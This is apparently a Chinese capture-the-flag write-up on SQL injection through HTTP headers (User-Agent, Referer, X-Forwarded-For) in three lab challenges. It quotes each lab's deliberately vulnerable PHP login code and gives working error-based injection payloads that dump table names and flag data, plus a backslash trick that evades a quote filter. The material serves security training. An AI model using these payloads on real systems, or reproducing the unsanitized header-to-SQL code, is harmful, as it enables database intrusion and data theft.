2. 程式人生 > 其它 >封神臺-Head注入

封神臺-Head注入

阿新 發佈:2021-09-03

思維導圖

Head注入(一)

核心程式碼

$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('為了網站安全性,禁止輸入某些特定符號');}
mysqli_select_db($conn,'****');//不想告訴你庫名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登入';

我們注意到這裡的語句

$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('為了網站安全性,禁止輸入某些特定符號');}

它這裡是有對輸入輸入框的單引號'做過濾的,所以我們要換一條路,不能直接在輸入框嘗試。

我們往下看,注意到程式碼

if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);

它這裡的意思很簡單,其實就是如果我們登陸成功了,就會把我們User-Agent和username記錄到資料庫裡面

那麼我們這裡是不是可以通過User-Agent這裡找到另一條路,我們可以採用報錯注入

採用updatexml報錯注入法查詢資料庫名

修改User-Agent為:
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '

然後進行登入(admin&123456)【這裡的使用者名稱密碼是需要我們猜出來的】

然後成功爆出資料庫名:head_error

查詢當前庫下表名

User-Agent:
' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or '

得出表名:flag_head,ip,refer,uagent,user

查詢flag_head表下欄位名

User-Agent:
' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag_head'),0x7e),1) or '

得出flag-head表字段名:Id,flag_h1

查詢flag_head表下flag_h1欄位資料

User-Agent:
' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head),0x7e),1) or '

得到flag_head表下flag_h1資料:zKaQ-YourHd,zKaQ-Refer,zKaQ-ipip

提交驗證,zKaQ-YourHd是本題flag

Head注入(二)

核心程式碼

$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('為了網站安全性,禁止輸入某些特定符號');}
mysqli_select_db($conn,'****');//不想告訴你庫名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登入';

我們注意到這一題基本程式碼和上一題是很像的,只不過本題放入資料庫儲存的不再是User-Agent,變成了Refer頭,仍屬於Head頭注入

本題我們仍採用報錯注入,這裡換一種方式,採用語句extractvalue

查詢資料庫名

Refer:
' or extractvalue(1,concat(0x7e,(select database()),0x7e)) or '

得到資料庫名:head_error

查詢當前庫下表名

Refer:
' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) or '

得出當前庫下表名:flag_head,ip,refer,uagent,user

查詢flag_head表字段名

Refer:
' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag_head'),0x7e)) or '

得出flag_head表字段名:Id,flag_h1

查詢flag_head表下flag_h1資料

Refer:
' or extractvalue(1,concat(0x7e,(select group_concat(flag_h1) from flag_head),0x7e)) or '

得到flag_head表下flag_h1資料:zKaQ-YourHd,zKaQ-Refer,zKaQ-ipip

提交驗證,zKaQ-Refer是本題flag

Head注入(三)

核心程式碼


function getip()
{
	if (getenv('HTTP_CLIENT_IP'))
	{
		$ip = getenv('HTTP_CLIENT_IP'); 
	}
	elseif (getenv('HTTP_X_FORWARDED_FOR')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED_FOR');
	}
	elseif (getenv('HTTP_X_FORWARDED')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED');
	}
	elseif (getenv('HTTP_FORWARDED_FOR'))
	{
		$ip = getenv('HTTP_FORWARDED_FOR'); 
	}
	elseif (getenv('HTTP_FORWARDED'))
	{
		$ip = getenv('HTTP_FORWARDED');
	}
	else
	{ 
		$ip = $_SERVER['REMOTE_ADDR'];
	}
	return $ip;
}
$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('為了網站安全性,禁止輸入某些特定符號');}
mysqli_select_db($conn,'****');//不想告訴你庫名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登入';

我們注意到他這裡用了一個很有意思的函式

function getip()
{
	if (getenv('HTTP_CLIENT_IP'))
	{
		$ip = getenv('HTTP_CLIENT_IP'); 
	}
	elseif (getenv('HTTP_X_FORWARDED_FOR')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED_FOR');
	}
	elseif (getenv('HTTP_X_FORWARDED')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED');
	}
	elseif (getenv('HTTP_FORWARDED_FOR'))
	{
		$ip = getenv('HTTP_FORWARDED_FOR'); 
	}
	elseif (getenv('HTTP_FORWARDED'))
	{
		$ip = getenv('HTTP_FORWARDED');
	}
	else
	{ 
		$ip = $_SERVER['REMOTE_ADDR'];
	}
	return $ip;
}

這個函式可以獲取當前登入該網站的使用者的IP資訊

而且我們注意到它這裡獲取的IP資訊也被儲存到資料庫裡面了,而且沒有進行過濾

所以我們可以針對他這個X-Forwarded-For進行注入,仍然屬於Head注入

於是接下來我們開始注入,這裡我們採用另一種不同的方式floor報錯注入方式

查詢資料庫資訊

新增X-Forwarded-For: 
' or (select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
or '

得出資料庫名:head_error

查詢表名資訊

修改X-Forwarded-For:
' or (select 1 from(select count(*),concat((select (select (select concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '

得出當前庫下表名:flag_head,ip,refer,uagent,user

查詢flag_head表下欄位資訊

修改X-Forwarded-For:
' or (select 1 from(select count(*),concat((select (select (select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag_head'),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '

得出flag_head表下欄位為:Id,flag_h1

查詢flag_head表下flag_h1資料

修改X-Forwarded-For:
' or (select 1 from(select count(*),concat((select (select (select concat(0x7e,(select group_concat(flag_h1) from flag_head),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '

得出flag_head表下flag_h1資料:zKaQ-YourHd,zKaQ-Refer,zKaQ-ipip

經過驗證zKaQ-ipip為本題flag

額外補充
我們知道上面三個Head注入靶場都有對單引號'進行過濾,但是我們其實可以進行繞過

我們在第一個框中填入\,在第二個框中填入or 1=1 -- qwe就可以進行繞過

實際執行程式碼

select *from user where username ='\' and password='or 1=1 -- qwe'

後續按照常規顯錯注入進行即可

相關推薦

神臺-Head注入

思維導圖 Head注入(一) 核心程式碼 $username = $_POST[\'username\']; $password = $_POST[\'password\'];

神臺-Access注入之Cookie注入

Access注入之Cookie注入 我們進入新聞頁面,隨便點選一條新聞進入 我們通過測試發現URL傳參是有檢測的,有WAF進行攔截,於是我們換一種思路,測試一下Cookie注入

神臺-偏移注入

前言 靶場採用Access資料庫,而且對於其餘傳參進行了限制,只可通過Cookie方式進行傳參;然後通過偏移注入方式獲取資料

神臺靶場:第一章:為了女神小芳!【配套課時:SQL注入攻擊原理 實戰演練】

靶場直鏈 http://59.63.200.79:8003/ 請求方式GET   閉合方式未知 注入方式聯合,布林,延時

神臺靶場-MSSQL注入

MSSQL顯錯注入 與MySQL聯合查詢不同,MSSQL聯合查詢由於資料型別匹配較為嚴格,所以需要union select null來代替數字,然後不斷嘗試尋找到正確的型別,但是大體上還是相似的

神臺靶場-Oracle注入

靶場 顯錯注入 判斷注入存在 http://59.63.200.79:8808/?id=1 and 1=1 #頁面正常 http://59.63.200.79:8808/?id=1 and 1=2 #頁面異常

神臺靶場:第七章:GET THE PASS! 【技能點:程序中抓下管理員明文密碼】

拿到SYSTEM之後,尤里並不滿足,他準備通過某種方式拿到伺服器管理員密碼,用來收集密碼資訊,以便其他方向的滲透,順便想將密碼發給小芳,用以炫技。卻不曾想,當尤里看到系統的明文密碼後。。大吃一驚。。。自此,

神臺靶場:萌新也能找CMS突破

靶場地址 http://59.63.200.79:8003/bluecms/uploads/ 百度查詢了bluecms的相關漏洞 發現存在sql注入,且sql注入點在如下網頁

如何使用sqlmap破解神臺靶場第一關

文章目錄 一.檢視是否有注入 使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch -u指令為檢視網址的url是否有漏洞。-batch為永遠不要求使用者輸入資訊,預設執行。

sql head注入

關於head注入的解釋 Header是指HTTP的頭,包括 User-Agent:使得伺服器能夠識別客戶使用的作業系統,遊覽器版本等.(很多資料量大的網站中會記錄客戶使用的作業系統或瀏覽器版本等存入資料庫中)

配置 Tor 代理池以及實現Sqlmap滲透注入IP測試

一、Tor 簡介 Tor是一款免費的開源軟體,可以讓你匿名上網。乍一看,它和普通的瀏覽器沒什麼兩樣。但在這尋常的表面之下,還有其他待發掘之處。Tor通過層層加密,把你的資料隨機發送到世界各地的伺服器網路,防止間諜

Spring Interceptor 自動注入導致迴圈依賴

1,bug現場還原 迴圈依賴 1.1,在攔截器配置類,通過構造器方式,依賴攔截器,重寫addInterceptors函式把攔截器注入到攔截器鏈中。

Spring Interceptor 自動注入FeignClient導致迴圈依賴2.0

1,bug現場還原 問題描述 我在寫攔截器的時候,多個類都是通過構造器注入,並且也在攔截器中通過構造器顯示宣告瞭依賴FeignClient,在專案啟動後,Spring依賴分析顯示,這些類產生了迴圈依賴

iOS 依賴注入與Objection

Created by Linxi 2020/05/01 依賴注入 首先先說明什麼叫做依賴注入 比如AController跳轉到BController,那麼這時候BController就需要在AController內部進行例項化,如下

iOS逆向 - shell 指令碼自動重簽名與程式碼注入

前言: 本篇文章建立在上篇部落格 : iOS逆向 - 應用簽名原理及重簽名 (重籤微信應用實戰) 的基礎知識之上的,不瞭解的同學歡迎去閱讀 . 本篇會講述如何利用 shell 指令碼自動重簽名和應用除錯 .

iOS逆向——shell重簽名及程式碼注入

感謝hank老師 上一章我們講了應用簽名原理和重簽名原理,不再贅述,沒有看過的同學可以點這裡——

一 什麼是依賴注入

此文是本人翻譯的來自國外某網站一篇文章 What is Dependency Injection?,第一次翻譯,各位見諒

為seed容器新增自動注入和AOP功能

前言   大概在半年前寫了一個簡陋的ioc容器,並設想實現很多功能,不過之後因為各種原因(主要是懶( ̄▽ ̄)\")閒置了。最近又重新將這個專案拾起,通過半個多月上班摸魚時間更新了兩個版本0.0.2(實現自動注入)和0

Spring IoC - 依賴注入 原始碼解析

前言 上一篇文章中,我們介紹了Spring IoC 的容器初始化過程 - IoC 容器初始化 本篇文章中,我們繼續介紹Spring IoC 依賴注入的過程和原始碼解讀。

Spring Boot 注入外部配置到應用內部的靜態變數

Spring Boot允許你外部化你的配置,這樣你就可以在不同的環境中使用相同的應用程式程式碼,你可以使用properties檔案、YAML檔案、環境變數和命令列引數來外部化配置,屬性值可以通過使用@Value註解直接注入到你的be